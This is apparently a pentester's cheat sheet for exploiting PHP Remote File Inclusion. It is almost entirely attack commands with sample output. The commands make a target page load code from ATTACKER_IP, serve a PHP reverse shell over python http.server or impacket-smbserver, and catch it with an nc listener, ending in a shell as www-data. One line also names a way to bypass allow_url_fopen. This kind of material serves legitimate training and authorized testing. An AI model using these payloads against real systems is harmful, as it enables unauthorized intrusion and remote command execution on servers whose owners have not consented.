REMOTE FILE INCLUSION (RFI)
Check if RFI is possible
See if external URL loads — allow_url_include must be ON
http://$IP/page.php?file=http://ATTACKER_IP/test.txt
Example Output
http://10.10.10.5/page.php?file=http://ATTACKER_IP/test.txt
On attacker HTTP server:
10.10.10.5 - - 'GET /test.txt HTTP/1.0' 200 -
(Target fetched your file = RFI works)
RFI with PHP reverse shell
Host a PHP reverse shell on your machine — python3 -m http.server 80 first
http://$IP/page.php?file=http://ATTACKER_IP/rev.php
Example Output
Host rev.php on attacker:
python3 -m http.server 80
http://10.10.10.5/page.php?file=http://ATTACKER_IP/rev.php
nc -nlvp 443:
connect to [ATTACKER] from [10.10.10.5]
$ whoami
www-data
RFI with SMB share
Host via SMB (no http needed) — impacket-smbserver share .
http://$IP/page.php?file=\\ATTACKER_IP\share\rev.php
Example Output
On attacker:
impacket-smbserver share . -smb2support
http://10.10.10.5/page.php?file=\\ATTACKER_IP\share\rev.php
nc -nlvp 443:
$ whoami
www-data
(Bypasses allow_url_fopen restrictions on some configs)